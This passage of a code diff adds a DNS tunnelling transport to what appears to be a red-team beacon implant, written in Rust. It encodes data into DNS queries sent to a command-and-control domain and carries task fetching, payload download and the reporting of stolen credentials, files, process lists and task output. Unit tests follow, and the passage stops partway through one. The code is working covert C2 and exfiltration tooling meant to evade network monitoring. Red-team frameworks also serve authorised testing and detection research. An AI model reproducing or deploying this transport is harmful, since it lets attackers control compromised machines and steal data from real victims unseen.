+ /// Base32 data is split into 63-char labels, total length <= 253 chars + fn build_subdomain(&self, packet: &DnsPacket) -> Result { + // Serialize packet to protobuf + let mut buf = Vec::new(); + packet.encode(&mut buf)?; + + // Encode entire packet as Base32 (includes all metadata) + let encoded = Self::encode_data(&buf); + + // Calculate total length + let base_domain_len = self.base_domain.len(); + let num_labels = (encoded.len() + MAX_LABEL_LENGTH - 1) / MAX_LABEL_LENGTH; + let total_len = encoded.len() + num_labels + base_domain_len; // +num_labels for dots between labels, +1 for dot before base_domain + + if total_len > MAX_DNS_NAME_LENGTH { + return Err(anyhow::anyhow!( + "DNS query too long: {} chars (max {}). protobuf={} bytes, encoded={} chars, labels={}, base_domain={} chars. Data in packet was {} bytes.", + total_len, + MAX_DNS_NAME_LENGTH, + buf.len(), + encoded.len(), + num_labels, + base_domain_len, + packet.data.len() + )); + } + + // Split encoded data + let mut labels = Vec::new(); + let mut remaining = encoded.as_str(); + while remaining.len() > MAX_LABEL_LENGTH { + let (chunk, rest) = remaining.split_at(MAX_LABEL_LENGTH); + labels.push(chunk); + remaining = rest; + } + if !remaining.is_empty() { + labels.push(remaining); + } + + // Build final domain: ..... 
+ labels.push(&self.base_domain); + Ok(labels.join(".")) + } + + /// Send packet and get response with resolver fallback + async fn send_packet(&mut self, packet: DnsPacket) -> Result<Vec<u8>> { + let subdomain = self.build_subdomain(&packet)?; + let (query, txid) = self.build_dns_query(&subdomain)?; + + // Try each DNS server in order + let mut last_error = None; + for attempt in 0..self.dns_servers.len() { + let server_idx = (self.current_server_index + attempt) % self.dns_servers.len(); + let server = &self.dns_servers[server_idx]; + + match self.try_dns_query(server, &query, txid).await { + Ok(response) => { + // Update current server on success + self.current_server_index = server_idx; + return Ok(response); + } + Err(e) => { + last_error = Some(e); + // Continue to next resolver + } + } + } + + Err(last_error.unwrap_or_else(|| anyhow::anyhow!("all DNS servers failed"))) + } + + /// Try a single DNS query against a specific server + async fn try_dns_query( + &self, + server: &str, + query: &[u8], + expected_txid: u16, + ) -> Result<Vec<u8>> { + // Create UDP socket with timeout + let socket = UdpSocket::bind("0.0.0.0:0").await?; + socket.connect(server).await?; + + // Send query + socket.send(query).await?; + + // Receive response with timeout + let mut buf = vec![0u8; DNS_RESPONSE_BUF_SIZE]; + let timeout_duration = std::time::Duration::from_secs(5); + let len = tokio::time::timeout(timeout_duration, socket.recv(&mut buf)) + .await + .map_err(|_| anyhow::anyhow!("timeout")) + .context("DNS query timeout")??; + buf.truncate(len); + + // Parse and validate response + self.parse_dns_response(&buf, expected_txid) + } + + /// Build DNS query packet with random transaction ID + fn build_dns_query(&self, domain: &str) -> Result<(Vec<u8>, u16)> { + let mut query = Vec::new(); + + // Transaction ID + let txid = rand::random::<u16>(); + query.extend_from_slice(&txid.to_be_bytes()); + // Flags: standard query + query.extend_from_slice(&[0x01, 0x00]); + // Questions: 1 +
+        query.extend_from_slice(&[0x00, 0x01]);
+        // Answer RRs: 0
+        query.extend_from_slice(&[0x00, 0x00]);
+        // Authority RRs: 0
+        query.extend_from_slice(&[0x00, 0x00]);
+        // Additional RRs: 0
+        query.extend_from_slice(&[0x00, 0x00]);
+
+        // Question section
+        for label in domain.split('.') {
+            if label.is_empty() {
+                continue;
+            }
+            query.push(label.len() as u8);
+            query.extend_from_slice(label.as_bytes());
+        }
+        query.push(0x00); // End of domain
+
+        // Type and Class based on record_type
+        match self.record_type {
+            DnsRecordType::TXT => {
+                // Type: TXT (16)
+                query.extend_from_slice(&[0x00, 0x10]);
+            }
+            DnsRecordType::A => {
+                // Type: A (1)
+                query.extend_from_slice(&[0x00, 0x01]);
+            }
+            DnsRecordType::AAAA => {
+                // Type: AAAA (28)
+                query.extend_from_slice(&[0x00, 0x1c]);
+            }
+        }
+        // Class: IN (1)
+        query.extend_from_slice(&[0x00, 0x01]);
+
+        Ok((query, txid))
+    }
+
+    /// Parse DNS response based on record type, validating transaction ID
+    fn parse_dns_response(&self, response: &[u8], expected_txid: u16) -> Result<Vec<u8>> {
+        if response.len() < 12 {
+            return Err(anyhow::anyhow!("DNS response too short"));
+        }
+
+        // Validate transaction ID
+        let response_txid = u16::from_be_bytes([response[0], response[1]]);
+        if response_txid != expected_txid {
+            return Err(anyhow::anyhow!(
+                "DNS transaction ID mismatch: expected {}, got {}",
+                expected_txid,
+                response_txid
+            ));
+        }
+
+        // Read answer count from header
+        let answer_count = u16::from_be_bytes([response[6], response[7]]) as usize;
+
+        // Skip to answer section
+        let mut offset = 12;
+
+        // Skip question section
+        while offset < response.len() && response[offset] != 0 {
+            let len = response[offset] as usize;
+            offset += len + 1;
+        }
+        offset += 5; // Skip null terminator, type, and class
+
+        // Parse all answer records and concatenate data
+        let mut all_data = Vec::new();
+
+        for _ in 0..answer_count {
+            if offset + 10 > response.len() {
+                return Err(anyhow::anyhow!("Invalid DNS response format"));
+            }
+
+            // Skip name (2-byte pointer), type (2), class (2), TTL (4)
+            offset += 10;
+
+            // Read data length
+            let data_len = u16::from_be_bytes([response[offset], response[offset + 1]]) as usize;
+            offset += 2;
+
+            if offset + data_len > response.len() {
+                return Err(anyhow::anyhow!("Invalid DNS record length"));
+            }
+
+            // Parse based on record type
+            match self.record_type {
+                DnsRecordType::TXT => {
+                    // TXT records have length-prefixed strings
+                    let mut txt_offset = offset;
+                    while txt_offset < offset + data_len {
+                        let str_len = response[txt_offset] as usize;
+                        txt_offset += 1;
+                        if txt_offset + str_len > offset + data_len {
+                            break;
+                        }
+                        all_data.extend_from_slice(&response[txt_offset..txt_offset + str_len]);
+                        txt_offset += str_len;
+                    }
+                }
+                DnsRecordType::A | DnsRecordType::AAAA => {
+                    // A records are 4 bytes, AAAA records are 16 bytes - append raw binary
+                    all_data.extend_from_slice(&response[offset..offset + data_len]);
+                }
+            }
+
+            offset += data_len;
+        }
+
+        // For A/AAAA records, data is base32-encoded text that needs decoding
+        if matches!(self.record_type, DnsRecordType::A | DnsRecordType::AAAA) {
+            // Trim null bytes from padding in A/AAAA records
+            while all_data.last() == Some(&0) {
+                all_data.pop();
+            }
+
+            let encoded_str =
+                String::from_utf8(all_data).context("invalid UTF-8 in A/AAAA response")?;
+            all_data = base32::decode(
+                base32::Alphabet::Rfc4648 { padding: false },
+                &encoded_str.to_uppercase(),
+            )
+            .ok_or_else(|| anyhow::anyhow!("base32 decode failed"))
+            .context("failed to decode base32 from A/AAAA records")?;
+        }
+
+        Ok(all_data)
+    }
+
+    async fn dns_exchange<Req, Resp>(&mut self, request: Req, method_code: &str) -> Result<Resp>
+    where
+        Req: Message + Send + 'static,
+        Resp: Message + Default + Send + 'static,
+    {
+        // Marshal request
+        let request_data = Self::marshal_with_codec::<Req>(request)?;
+
+        // Send raw bytes and unmarshal response
+        let response_data = self.dns_exchange_raw(request_data, method_code).await?;
+        Self::unmarshal_with_codec::<Resp>(&response_data)
+    }
+
+    /// Validate request data and calculate optimal chunking strategy
+    fn validate_and_prepare_chunks(&self, request_data: &[u8]) -> Result<(usize, usize, u32)> {
+        // Validate data size
+        if request_data.len() > MAX_DATA_SIZE {
+            return Err(anyhow::anyhow!(
+                "Request data exceeds maximum size: {} bytes > {} bytes",
+                request_data.len(),
+                MAX_DATA_SIZE
+            ));
+        }
+
+        // Calculate exact chunk_size and total_chunks using varint boundary solving
+        // Protobuf varints encode differently based on value:
+        // [1, 127] → 1 byte, [128, 16383] → 2 bytes, [16384, 2097151] → 3 bytes
+        let (chunk_size, total_chunks) = if request_data.is_empty() {
+            (self.calculate_max_chunk_size(1), 1)
+        } else {
+            let varint_ranges = [(1u32, 127u32), (128u32, 16383u32), (16384u32, 2097151u32)];
+
+            let mut result = None;
+            for (min_chunks, max_chunks) in varint_ranges.iter() {
+                // Calculate overhead assuming worst case (max sequence in this range)
+                let chunk_size = self.calculate_max_chunk_size(*max_chunks);
+                let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1);
+
+                // Check if the calculated total_chunks falls within this range
+                if total_chunks >= *min_chunks as usize && total_chunks <= *max_chunks as usize {
+                    // Found the correct range - this is exact
+                    result = Some((chunk_size, total_chunks));
+                    break;
+                }
+            }
+
+            // Fallback for very large data
+            result.unwrap_or_else(|| {
+                let chunk_size = self.calculate_max_chunk_size(2097151);
+                let total_chunks = ((request_data.len() + chunk_size - 1) / chunk_size).max(1);
+                (chunk_size, total_chunks)
+            })
+        };
+
+        let data_crc = Self::calculate_crc32(request_data);
+
+        #[cfg(debug_assertions)]
+        log::debug!(
+            "DNS: Request size={} bytes, chunks={}, chunk_size={} bytes, crc32={:#x}",
+            request_data.len(),
+            total_chunks,
+            chunk_size,
+            data_crc
+        );
+
+        Ok((chunk_size, total_chunks, data_crc))
+    }
+
+    /// Send INIT packet to start a new conversation
+    async fn send_init_packet(
+        &mut self,
+        conv_id: &str,
+        method_code: &str,
+        total_chunks: usize,
+        data_size: usize,
+        data_crc: u32,
+    ) -> Result<()> {
+        let init_payload = InitPayload {
+            method_code: method_code.to_string(),
+            total_chunks: total_chunks as u32,
+            data_crc32: data_crc,
+            file_size: data_size as u32,
+        };
+        let mut init_payload_bytes = Vec::new();
+        init_payload.encode(&mut init_payload_bytes)?;
+
+        #[cfg(debug_assertions)]
+        log::debug!(
+            "DNS: INIT packet - conv_id={}, method={}, total_chunks={}, file_size={}, data_crc32={:#x}",
+            conv_id, method_code, total_chunks, data_size, data_crc
+        );
+
+        let init_packet = DnsPacket {
+            r#type: PacketType::Init.into(),
+            sequence: 0,
+            conversation_id: conv_id.to_string(),
+            data: init_payload_bytes,
+            crc32: 0,
+            window_size: SEND_WINDOW_SIZE as u32,
+            acks: vec![],
+            nacks: vec![],
+        };
+
+        self.send_packet(init_packet)
+            .await
+            .context("failed to send INIT packet")?;
+
+        #[cfg(debug_assertions)]
+        log::debug!("DNS: INIT sent for conv_id={}", conv_id);
+
+        Ok(())
+    }
+
+    /// Process a single chunk response and extract ACKs/NACKs
+    fn process_chunk_response(
+        response_data: &[u8],
+        seq_num: u32,
+        total_chunks: usize,
+    ) -> Result<(Vec<u32>, Vec<u32>)> {
+        let mut acks = Vec::new();
+        let mut nacks = Vec::new();
+
+        if let Ok(status_packet) = DnsPacket::decode(response_data) {
+            if status_packet.r#type == PacketType::Status.into() {
+                // Process ACKs - collect acknowledged sequences
+                for ack_range in &status_packet.acks {
+                    for ack_seq in ack_range.start_seq..=ack_range.end_seq {
+                        acks.push(ack_seq);
+                    }
+                }
+
+                // Process NACKs - collect sequences needing retransmission
+                for &nack_seq in &status_packet.nacks {
+                    if nack_seq >= 1 && nack_seq <= total_chunks as u32 {
+                        nacks.push(nack_seq);
+                    }
+                }
+            }
+        } else {
+            #[cfg(debug_assertions)]
+            log::debug!(
+                "DNS: Unknown response format ({} bytes), retrying chunk",
+                response_data.len()
+            );
+            nacks.push(seq_num);
+        }
+
+        Ok((acks, nacks))
+    }
+
+    /// Send data chunks concurrently with windowed transmission
+    async fn send_data_chunks_concurrent(
+        &mut self,
+        chunks: &[Vec<u8>],
+        conv_id: &str,
+        total_chunks: usize,
+    ) -> Result<(
+        std::collections::HashSet<u32>,
+        std::collections::HashSet<u32>,
+    )> {
+        use std::collections::HashSet;
+
+        let mut acknowledged = HashSet::new();
+        let mut nack_set = HashSet::new();
+        let mut send_tasks = Vec::new();
+
+        for seq in 1..=total_chunks {
+            let seq_u32 = seq as u32;
+
+            if acknowledged.contains(&seq_u32) {
+                continue;
+            }
+
+            let chunk = chunks[seq - 1].clone();
+            let conv_id_clone = conv_id.to_string();
+            let mut transport_clone = self.clone();
+
+            // Spawn concurrent task for this packet
+            let task = tokio::spawn(async move {
+                let data_packet = DnsPacket {
+                    r#type: PacketType::Data.into(),
+                    sequence: seq_u32,
+                    conversation_id: conv_id_clone,
+                    data: chunk.clone(),
+                    crc32: Self::calculate_crc32(&chunk),
+                    window_size: SEND_WINDOW_SIZE as u32,
+                    acks: vec![],
+                    nacks: vec![],
+                };
+
+                let result = transport_clone.send_packet(data_packet).await;
+                (seq_u32, result)
+            });
+
+            send_tasks.push(task);
+
+            // Limit concurrent tasks to SEND_WINDOW_SIZE
+            if send_tasks.len() >= SEND_WINDOW_SIZE {
+                if let Some(task) = send_tasks.first_mut() {
+                    if let Ok(task_result) = task.await {
+                        self.handle_chunk_task_result(
+                            task_result,
+                            &mut acknowledged,
+                            &mut nack_set,
+                            total_chunks,
+                        )?;
+                    }
+                    send_tasks.remove(0);
+                }
+            }
+        }
+
+        // Wait for all remaining tasks to complete
+        for task in send_tasks {
+            if let Ok(task_result) = task.await {
+                self.handle_chunk_task_result(
+                    task_result,
+                    &mut acknowledged,
+                    &mut nack_set,
+                    total_chunks,
+                )?;
+            }
+        }
+
+        Ok((acknowledged, nack_set))
+    }
+
+    /// Handle the result of a chunk transmission task
+    fn handle_chunk_task_result(
+        &self,
+        task_result: (u32, Result<Vec<u8>>),
+        acknowledged: &mut std::collections::HashSet<u32>,
+        nack_set: &mut std::collections::HashSet<u32>,
+        total_chunks: usize,
+    ) -> Result<()> {
+        match task_result {
+            (seq_num, Ok(response_data)) => {
+                let (acks, nacks) =
+                    Self::process_chunk_response(&response_data, seq_num, total_chunks)?;
+                acknowledged.extend(acks);
+                nack_set.extend(nacks);
+            }
+            (seq_num, Err(e)) => {
+                let err_msg = e.to_string();
+                #[cfg(debug_assertions)]
+                log::error!("Failed to send chunk {}: {}", seq_num, err_msg);
+
+                // If packet is too long, this is a fatal error
+                if err_msg.contains("DNS query too long") {
+                    return Err(anyhow::anyhow!(
+                        "Chunk {} is too large to fit in DNS query: {}",
+                        seq_num,
+                        err_msg
+                    ));
+                }
+
+                // Otherwise, mark for retry
+                nack_set.insert(seq_num);
+            }
+        }
+        Ok(())
+    }
+
+    /// Retry NACKed chunks with retry limit
+    async fn retry_nacked_chunks(
+        &mut self,
+        chunks: &[Vec<u8>],
+        conv_id: &str,
+        total_chunks: usize,
+        mut nack_set: std::collections::HashSet<u32>,
+        acknowledged: &mut std::collections::HashSet<u32>,
+    ) -> Result<()> {
+        use std::collections::HashMap;
+
+        let mut retry_counts: HashMap<u32, u32> = HashMap::new();
+
+        while !nack_set.is_empty() {
+            let nacks_to_retry: Vec<u32> = nack_set.drain().collect();
+
+            for nack_seq in nacks_to_retry {
+                // Check retry limit
+                let retries = retry_counts.entry(nack_seq).or_insert(0);
+                if *retries >= MAX_RETRIES_PER_CHUNK {
+                    return Err(anyhow::anyhow!(
+                        "Max retries exceeded for chunk {}",
+                        nack_seq
+                    ));
+                }
+                *retries += 1;
+
+                // Skip if already acknowledged
+                if acknowledged.contains(&nack_seq) {
+                    continue;
+                }
+
+                if let Some(chunk) = chunks.get((nack_seq - 1) as usize) {
+                    let retransmit_packet = DnsPacket {
+                        r#type: PacketType::Data.into(),
+                        sequence: nack_seq,
+                        conversation_id: conv_id.to_string(),
+                        data: chunk.clone(),
+                        crc32: Self::calculate_crc32(chunk),
+                        window_size: SEND_WINDOW_SIZE as u32,
+                        acks: vec![],
+                        nacks: vec![],
+                    };
+
+                    match self.send_packet(retransmit_packet).await {
+                        Ok(response_data) => {
+                            let (acks, nacks) = Self::process_chunk_response(
+                                &response_data,
+                                nack_seq,
+                                total_chunks,
+                            )?;
+
+                            // Process ACKs
+                            for ack_seq in acks {
+                                acknowledged.insert(ack_seq);
+                                retry_counts.remove(&ack_seq);
+                            }
+
+                            // Process NACKs
+                            for new_nack in nacks {
+                                if !acknowledged.contains(&new_nack) {
+                                    nack_set.insert(new_nack);
+                                }
+                            }
+                        }
+                        Err(_) => {
+                            // Retry failed - add back to NACK set
+                            nack_set.insert(nack_seq);
+                        }
+                    }
+                }
+            }
+        }
+
+        Ok(())
+    }
+
+    /// Fetch response from server, handling potentially chunked responses
+    async fn fetch_response(&mut self, conv_id: &str, total_chunks: usize) -> Result<Vec<u8>> {
+        #[cfg(debug_assertions)]
+        log::debug!(
+            "DNS: All {} chunks acknowledged, sending FETCH",
+            total_chunks
+        );
+
+        let fetch_packet = DnsPacket {
+            r#type: PacketType::Fetch.into(),
+            sequence: (total_chunks + 1) as u32,
+            conversation_id: conv_id.to_string(),
+            data: vec![],
+            crc32: 0,
+            window_size: 0,
+            acks: vec![],
+            nacks: vec![],
+        };
+
+        let end_response = self
+            .send_packet(fetch_packet)
+            .await
+            .context("failed to fetch response from server")?;
+
+        #[cfg(debug_assertions)]
+        log::debug!(
+            "DNS: FETCH response received ({} bytes)",
+            end_response.len()
+        );
+
+        // Validate response is not empty
+        if end_response.is_empty() {
+            return Err(anyhow::anyhow!("Server returned empty response."));
+        }
+
+        // Check if response is chunked
+        if let Ok(metadata) = ResponseMetadata::decode(&end_response[..]) {
+            if metadata.total_chunks > 0 {
+                return self
+                    .fetch_chunked_response(conv_id, total_chunks, &metadata)
+                    .await;
+            }
+        }
+
+        Ok(end_response)
+    }
+
+    /// Fetch and reassemble a chunked response from server
+    async fn fetch_chunked_response(
+        &mut self,
+        conv_id: &str,
+        base_sequence: usize,
+        metadata: &ResponseMetadata,
+    ) -> Result<Vec<u8>> {
+        let total_chunks = metadata.total_chunks as usize;
+        let expected_crc = metadata.data_crc32;
+        let mut full_response = Vec::new();
+
+        for chunk_idx in 1..=total_chunks {
+            let fetch_payload = FetchPayload {
+                chunk_index: chunk_idx as u32,
+            };
+            let mut fetch_payload_bytes = Vec::new();
+            fetch_payload.encode(&mut fetch_payload_bytes)?;
+
+            let fetch_packet = DnsPacket {
+                r#type: PacketType::Fetch.into(),
+                sequence: (base_sequence as u32 + 2 + chunk_idx as u32),
+                conversation_id: conv_id.to_string(),
+                data: fetch_payload_bytes,
+                crc32: 0,
+                window_size: 0,
+                acks: vec![],
+                nacks: vec![],
+            };
+
+            let chunk_data = self.send_packet(fetch_packet).await?;
+            full_response.extend_from_slice(&chunk_data);
+        }
+
+        let actual_crc = Self::calculate_crc32(&full_response);
+        if actual_crc != expected_crc {
+            return Err(anyhow::anyhow!(
+                "Response CRC mismatch: expected {}, got {}",
+                expected_crc,
+                actual_crc
+            ));
+        }
+
+        Ok(full_response)
+    }
+
+    async fn dns_exchange_raw(
+        &mut self,
+        request_data: Vec<u8>,
+        method_code: &str,
+    ) -> Result<Vec<u8>> {
+        // Validate and prepare chunks
+        let (chunk_size, total_chunks, data_crc) =
+            self.validate_and_prepare_chunks(&request_data)?;
+
+        // Generate conversation ID
+        let conv_id = Self::generate_conv_id();
+
+        // Send INIT packet
+        self.send_init_packet(
+            &conv_id,
+            method_code,
+            total_chunks,
+            request_data.len(),
+            data_crc,
+        )
+        .await?;
+
+        // Prepare chunks
+        let chunks: Vec<Vec<u8>> = request_data
+            .chunks(chunk_size)
+            .map(|chunk| chunk.to_vec())
+            .collect();
+
+        // Send all chunks using concurrent windowed transmission
+        let (mut acknowledged, nack_set) = self
+            .send_data_chunks_concurrent(&chunks, &conv_id, total_chunks)
+            .await?;
+
+        // Retry NACKed chunks
+        self.retry_nacked_chunks(&chunks, &conv_id, total_chunks, nack_set, &mut acknowledged)
+            .await?;
+
+        // Verify all chunks acknowledged
+        if acknowledged.len() != total_chunks {
+            return Err(anyhow::anyhow!(
+                "Not all chunks acknowledged after max retries: {}/{} chunks. Missing: {:?}",
+                acknowledged.len(),
+                total_chunks,
+                (1..=total_chunks as u32)
+                    .filter(|seq| !acknowledged.contains(seq))
+                    .collect::<Vec<u32>>()
+            ));
+        }
+
+        // Fetch response from server
+        self.fetch_response(&conv_id, total_chunks).await
+    }
+}
+
+impl Transport for DNS {
+    fn init() -> Self {
+        DNS {
+            base_domain: String::new(),
+            dns_servers: Vec::new(),
+            current_server_index: 0,
+            record_type: DnsRecordType::TXT,
+        }
+    }
+
+    fn new(callback: String, _proxy_uri: Option<String>) -> Result<Self> {
+        // Parse DNS URL formats:
+        //   dns://server:port?domain=dnsc2.realm.pub&type=txt (single server, TXT records)
+        //   dns://*?domain=dnsc2.realm.pub&type=a (use system DNS + fallbacks, A records)
+        //   dns://8.8.8.8:53,1.1.1.1:53?domain=dnsc2.realm.pub&type=aaaa (multiple servers, AAAA records)
+        let url = if callback.starts_with("dns://") {
+            callback
+        } else {
+            format!("dns://{}", callback)
+        };
+
+        let parsed = url::Url::parse(&url)?;
+        let base_domain = parsed
+            .query_pairs()
+            .find(|(k, _)| k == "domain")
+            .map(|(_, v)| v.to_string())
+            .ok_or_else(|| anyhow::anyhow!("domain parameter is required"))?
+            .to_string();
+
+        if base_domain.is_empty() {
+            return Err(anyhow::anyhow!("domain parameter cannot be empty"));
+        }
+
+        // Parse record type from URL (default: TXT)
+        let record_type = parsed
+            .query_pairs()
+            .find(|(k, _)| k == "type")
+            .map(|(_, v)| match v.to_lowercase().as_str() {
+                "a" => DnsRecordType::A,
+                "aaaa" => DnsRecordType::AAAA,
+                _ => DnsRecordType::TXT,
+            })
+            .unwrap_or(DnsRecordType::TXT);
+
+        let mut dns_servers = Vec::new();
+
+        // Check if using wildcard for system DNS
+        if let Some(host) = parsed.host_str() {
+            if host == "*" {
+                // Use system DNS servers + fallbacks
+                #[cfg(feature = "dns")]
+                {
+                    use hickory_resolver::system_conf::read_system_conf;
+                    if let Ok((config, _opts)) = read_system_conf() {
+                        for server in config.name_servers() {
+                            dns_servers.push(format!("{}:53", server.socket_addr.ip()));
+                        }
+                    }
+                }
+                // Add fallbacks
+                dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string()));
+            } else {
+                // Parse comma-separated servers or single server
+                for server_part in host.split(',') {
+                    let server = server_part.trim();
+                    let port = parsed.port().unwrap_or(53);
+                    dns_servers.push(format!("{}:{}", server, port));
+                }
+            }
+        }
+
+        // If no servers configured, use fallbacks
+        if dns_servers.is_empty() {
+            dns_servers.extend(FALLBACK_DNS_SERVERS.iter().map(|s| s.to_string()));
+        }
+
+        Ok(DNS {
+            base_domain,
+            dns_servers,
+            current_server_index: 0,
+            record_type,
+        })
+    }
+
+    async fn claim_tasks(&mut self, request: ClaimTasksRequest) -> Result<ClaimTasksResponse> {
+        self.dns_exchange(request, "/c2.C2/ClaimTasks").await
+    }
+
+    async fn fetch_asset(
+        &mut self,
+        request: FetchAssetRequest,
+        sender: Sender<FetchAssetResponse>,
+    ) -> Result<()> {
+        // Send fetch request and get raw response bytes
+        let response_bytes = self
+            .dns_exchange_raw(
+                Self::marshal_with_codec::<FetchAssetRequest>(request)?,
+                "/c2.C2/FetchAsset",
+            )
+            .await?;
+
+        // Parse length-prefixed encrypted chunks and send each one
+        let mut offset = 0;
+        while offset < response_bytes.len() {
+            // Check if we have enough bytes for length prefix
+            if offset + 4 > response_bytes.len() {
+                break;
+            }
+
+            // Read 4-byte length prefix (big-endian)
+            let chunk_len = u32::from_be_bytes([
+                response_bytes[offset],
+                response_bytes[offset + 1],
+                response_bytes[offset + 2],
+                response_bytes[offset + 3],
+            ]) as usize;
+            offset += 4;
+
+            // Check if we have the full chunk
+            if offset + chunk_len > response_bytes.len() {
+                return Err(anyhow::anyhow!(
+                    "Invalid chunk length: {} bytes at offset {}, total size {}",
+                    chunk_len,
+                    offset - 4,
+                    response_bytes.len()
+                ));
+            }
+
+            // Extract and decrypt chunk
+            let encrypted_chunk = &response_bytes[offset..offset + chunk_len];
+            let chunk_response =
+                Self::unmarshal_with_codec::<FetchAssetResponse>(encrypted_chunk)?;
+
+            // Send chunk through channel
+            sender
+                .send(chunk_response)
+                .map_err(|_| anyhow::anyhow!("receiver dropped"))
+                .context("failed to send chunk")?;
+
+            offset += chunk_len;
+        }
+
+        Ok(())
+    }
+
+    async fn report_credential(
+        &mut self,
+        request: ReportCredentialRequest,
+    ) -> Result<ReportCredentialResponse> {
+        self.dns_exchange(request, "/c2.C2/ReportCredential").await
+    }
+
+    async fn report_file(
+        &mut self,
+        request: Receiver<ReportFileRequest>,
+    ) -> Result<ReportFileResponse> {
+        // Spawn a task to collect chunks from the sync channel receiver
+        // This is necessary because iterating over the sync receiver would block the async task
+        let handle = tokio::spawn(async move {
+            let mut all_chunks = Vec::new();
+
+            for chunk in request {
+                let chunk_bytes = Self::marshal_with_codec::<ReportFileRequest>(chunk)?;
+                // Prefix each chunk with its length (4 bytes, big-endian)
+                all_chunks.extend_from_slice(&(chunk_bytes.len() as u32).to_be_bytes());
+                all_chunks.extend_from_slice(&chunk_bytes);
+            }
+
+            Ok::<Vec<u8>, anyhow::Error>(all_chunks)
+        });
+
+        // Wait for the spawned task to complete
+        let all_chunks = handle
+            .await
+            .context("failed to join chunk collection task")??;
+
+        if all_chunks.is_empty() {
+            return Err(anyhow::anyhow!("No file data provided"));
+        }
+
+        // Send all chunks as a single DNS exchange
+        let response_bytes = self
+            .dns_exchange_raw(all_chunks, "/c2.C2/ReportFile")
+            .await?;
+
+        // Unmarshal response
+        Self::unmarshal_with_codec::<ReportFileResponse>(&response_bytes)
+    }
+
+    async fn report_process_list(
+        &mut self,
+        request: ReportProcessListRequest,
+    ) -> Result<ReportProcessListResponse> {
+        self.dns_exchange(request, "/c2.C2/ReportProcessList").await
+    }
+
+    async fn report_task_output(
+        &mut self,
+        request: ReportTaskOutputRequest,
+    ) -> Result<ReportTaskOutputResponse> {
+        self.dns_exchange(request, "/c2.C2/ReportTaskOutput").await
+    }
+
+    async fn reverse_shell(
+        &mut self,
+        _rx: tokio::sync::mpsc::Receiver<ReverseShellRequest>,
+        _tx: tokio::sync::mpsc::Sender<ReverseShellResponse>,
+    ) -> Result<()> {
+        Err(anyhow::anyhow!(
+            "reverse_shell not supported over DNS transport"
+        ))
+    }
+
+    fn get_type(&mut self) -> beacon::Transport {
+        beacon::Transport::Dns
+    }
+
+    fn is_active(&self) -> bool {
+        !self.base_domain.is_empty() && !self.dns_servers.is_empty()
+    }
+
+    fn name(&self) -> &'static str {
+        "dns"
+    }
+
+    fn list_available(&self) -> Vec<String> {
+        vec!["dns".to_string()]
+    }
+}
+
+#[cfg(test)]
+mod tests {
+    use super::*;
+    use pb::dns::PacketType;
+
+    // ============================================================
+    // CRC32 Tests
+    // ============================================================
+
+    #[test]
+    fn test_crc32_basic() {
+        let data = b"test data for CRC validation";
+        let crc = DNS::calculate_crc32(data);
+
+        // Verify same data produces same CRC
+        let crc2 = DNS::calculate_crc32(data);
+        assert_eq!(crc, crc2);
+
+        // Verify different data produces different CRC
+        let crc3 = DNS::calculate_crc32(b"test datA for CRC validation");
+        assert_ne!(crc, crc3);
+    }
+
+    #[test]
+    fn test_crc32_known_value() {
+        // CRC32 IEEE of "123456789" is 0xCBF43926
+        let data = b"123456789";
+        let crc = DNS::calculate_crc32(data);
+        assert_eq!(crc, 0xCBF43926);
+    }
+
+    #[test]
+    fn test_generate_conv_id_length() {
+        let conv_id = DNS::generate_conv_id();
+        assert_eq!(conv_id.len(), CONV_ID_LENGTH);
+    }
+
+    #[test]
+    fn test_generate_conv_id_charset() {
+        let conv_id = DNS::generate_conv_id();
+        for c in conv_id.chars() {
+            assert!(c.is_ascii_lowercase() || c.is_ascii_digit());
+        }
+    }
+
+    #[test]
+    fn test_generate_conv_id_uniqueness() {
+        let id1 = DNS::generate_conv_id();
+        let id2 = DNS::generate_conv_id();
+        // Statistically, two random 8-char IDs should not be equal
+        assert_ne!(id1, id2);
+    }
+
+    #[test]
+    fn test_encode_data_lowercase() {
+        let data = b"hello";
+        let encoded = DNS::encode_data(data);
+
+        // Should be lowercase
+        assert_eq!(encoded, encoded.to_lowercase());
+    }
+
+    #[test]
+    fn test_encode_data_valid_chars() {
+        let data = b"test data with various bytes \x00\xFF";
+        let encoded = DNS::encode_data(data);
+
+        // Base32 only uses a-z, 2-7
+        for c in encoded.chars() {
+            assert!(
+                c.is_ascii_lowercase() || ('2'..='7').contains(&c),
+                "Invalid char in base32: {}",
+                c
+            );
+        }
+    }
+
+    // ============================================================
+    // URL Parsing / Transport::new Tests
+    // ============================================================
+
+    #[test]
+    fn test_new_single_server() {
+        let dns = DNS::new("dns://8.8.8.8:53?domain=dnsc2.realm.pub".to_string(), None)
+            .expect("should parse");
+
+        assert_eq!(dns.base_domain, "dnsc2.realm.pub");
+        assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string()));
+        assert_eq!(dns.record_type, DnsRecordType::TXT);
+    }
+
+    #[test]
+    fn test_new_multiple_servers() {
+        // Multiple servers are specified in the host portion, comma-separated
+        let dns = DNS::new(
+            "dns://8.8.8.8,1.1.1.1:53?domain=dnsc2.realm.pub".to_string(),
+            None,
+        )
+        .expect("should parse");
+
+        assert_eq!(dns.dns_servers.len(), 2);
+        assert!(dns.dns_servers.contains(&"8.8.8.8:53".to_string()));
+        assert!(dns.dns_servers.contains(&"1.1.1.1:53".to_string()));
+    }
+
+    #[test]
+    fn test_new_record_type_a() {
+        let dns = DNS::new(
+            "dns://8.8.8.8?domain=dnsc2.realm.pub&type=a".to_string(),
+            None,
+        )
+        .expect("should parse");
